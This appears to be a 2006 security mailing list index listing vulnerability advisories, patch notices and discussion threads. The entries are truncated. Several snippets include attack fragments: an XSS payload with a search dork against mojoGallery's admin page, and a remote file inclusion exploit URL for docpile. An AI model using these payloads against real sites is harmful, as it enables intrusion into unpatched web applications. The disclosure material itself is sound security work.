SUSE Security Announcement: clamav (SUSE-SA:2006:046)
2006-08-09 Ludwig Nussel (ludwig nussel suse de)

[Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow
2006-08-09 pucik overflow pl
Overflow.pl Security Advisory #6 Clam AntiVirus Win32-UPX Heap Overflow Vendor: Clam AntiVirus Affected version: Prior to 0.88.4 Vendor status: Fixed version released (0.88.4) Author: Damian Put <pucik (at) overflow (dot) pl [email concealed]> URL: http://www.overflow.pl/adv/clamav_upx_heap.txt Date: 09.08.2006 1. Backgroun

rPSA-2006-0150-1 krb5 krb5-server krb5-services krb5-test krb5-workstation
2006-08-09 Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0150-1 Published: 2006-08-09 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: krb5=/conary.rpath.com@rpl:devel//1/1.4.1-7.2-1 krb5-server=/conary.rpath.com@rpl:devel//1/1.4.1

ERRATA: [ GLSA 200608-08 ] GnuPG: Integer overflow vulnerability
2006-08-08 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Re: Will Microsoft patch remarkable old Msjet40.dll issue?
2006-08-08 Juha-Matti Laurio (juha-matti laurio netti fi)
New monthly updates from Microsoft don't include patch to Msjet40.dll vulnerability affecting Access and some other products. There is patch to critical 0-day vulnerability in PowerPoint aka Mso.dll vulnerability (CVE-2006-3590): http://www.microsoft.com/technet/security/bulletin/ms06-048.mspx - J

MITKRB-SA-2006-001: multiple local privilege escalation vulnerabilities
2006-08-08 Tom Yu (tlyu MIT EDU)

MojoScripts' xss vulnerable
2006-08-08 tugra icqmail com
SOFTWARE: MojoScripts' mojoGallery All version DESCRIPTION: dork: "Powered by mojoGallery" add to last path /admin.cgi , admin and password input <script>alert("lol")</script> or all html tags mail: tugra (at) icqmail (dot) com [email concealed] , alp_eren (at) ayyildiz (dot) org [email concealed]

Microsoft PowerPoint Malformed Record Memory Corruption
2006-08-08 Sowhat (smaillist gmail com)
Microsoft PowerPoint Malformed Record Memory Corruption Vulnerability By Sowhat of Nevis Labs 2006.08.08 http://www.nevisnetworks.com http://secway.org/advisory/AD20060808.txt Vendor Microsoft Inc. Microsoft PowerPoint 2000 Microsoft PowerPoint 2002 Microsoft Office PowerPoint 2003 PowerPoint

[ GLSA 200608-14 ] DUMB: Heap buffer overflow
2006-08-08 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

rPSA-2006-0147-1 mysql mysql-bench mysql-server
2006-08-07 Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0147-1 Published: 2006-08-07 Products: rPath Linux 1 Rating: Informational Exposure Level Classification: Local Non-deterministic Weakness Updated Versions: mysql=/conary.rpath.com@rpl:devel//1/5.0.24-1-0.1 mysql-bench=/conary.rpath.com@rpl:devel//1/5.0.24-1

docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
2006-08-08 x0r0n hotmail com
TiTLE: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability - Author: xoron - Class : Remote - cont@ct: x0r0n[at]hotmail[dot]com - URL: http://docpile-we.berlios.de - Exploit: http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http

phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
2006-08-08 tr_zindan wolfsecurity org
phNNTP v1.3 Remote File Inclusion CreW: ToxiC By:Tr_ZiNDaN mail:tr_zindan (at) wolfsecurity (dot) org [email concealed] Source Code: http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz Problem Is: require("$file_newsportal"); Page Affect: article-raw.php Path: Declare file_newsportal ExPLoit

[SECURITY] [DSA 1145-1] New freeradius packages fix several vulnerabilities
2006-08-07 Moritz Muehlenhoff (jmm debian org)

Archangel Weblog 0.90.02 and prior Multiple HTML injections
2006-08-08 piiiiiii pppiiiiiiii (heliosz_time hotmail com)
## HeLiOsZ - Dark End Team - Internet Security Team ## Archangel Weblog 0.90.02 and prior Multiple HTML injections ## IRC: darkend.sytes.net #darkend , http://darkend.sytes.net & http://www.darkend.org ## Risk : Medium ## Type : web applet ## Creator: http://www.archangelmgt.com/ ## Exploit: - T

ZDI-06-027: Microsoft Internet Explorer CSS Class Ordering Memory Corruption Vulnerability
2006-08-08 zdi-disclosures 3com com

ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability
2006-08-08 zdi-disclosures 3com com

TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities
2006-08-08 TSRT 3com com
TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-06-07.html August 8, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: Enterprise Security Anal

[EEYEB-20060719] McAfee Subscription Manager Stack Buffer Overflow
2006-08-07 eEye Advisories (Advisories eeye com)
McAfee Subscription Manager Stack Buffer Overflow Release Date: August 7, 2006 Date Reported: July 19, 2006 Patch Development Time (In Days): 17 Days Severity: High (Remote Code Execution) Vendor: McAfee Systems Affected: McAfee AntiSpyware 1.x, 2.x McAfee Internet Security Suite 6.x, 7.x

Announcement: Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations [Whitepaper]
2006-08-07 SPI Labs (Spi Labs spidynamics com)
"One new feature of "Web 2.0", the movement to build a more responsive Web, is the utilization of XML content feeds which use the RSS and Atom standards. These feeds allow both users and Web sites to obtain content headlines and body text without needing to visit the site in question, basically pro

phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability
2006-08-07 sh3ll sh3ll ir
phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion Author : Sh3ll Date : 2006/04/27 Location : Ira

AUTODAFE: an Act of Software Torture [FUZZER]
2006-08-04 Martin Vuagnoux (autodafe vuagnoux com)
Dear list, let me present you the public release of a fuzzer presented at 22c3: Autodafé is a fuzzing framework able to uncover buffer overflows by using the fuzzing by weighting attacks with markers technique. http://autodafe.sourceforge.net You will find a paper explaining the technique used,

Re: [Full-disclosure] Attacking the local LAN via XSS
2006-08-04 Thierry Zoller (Thierry Zoller lu) (1 replies)
Dear pdp (architect),
pa> xecuted of the border router domain
I'd like to see a "border router" serving images on port 80 ??? Doesn't make sense, really ;) No pun intended.
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

Re: [Full-disclosure] Attacking the local LAN via XSS
2006-08-04 pdp (architect) (pdp gnucitizen googlemail com)

Re: [Full-disclosure] Attacking the local LAN via XSS
2006-08-04 Schanulleke (schalulleke gmail com)

Ubuntu Security Notice USN-333-1 August 09, 2006
libwmf vulnerability
CVE-2006-3376
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
Ub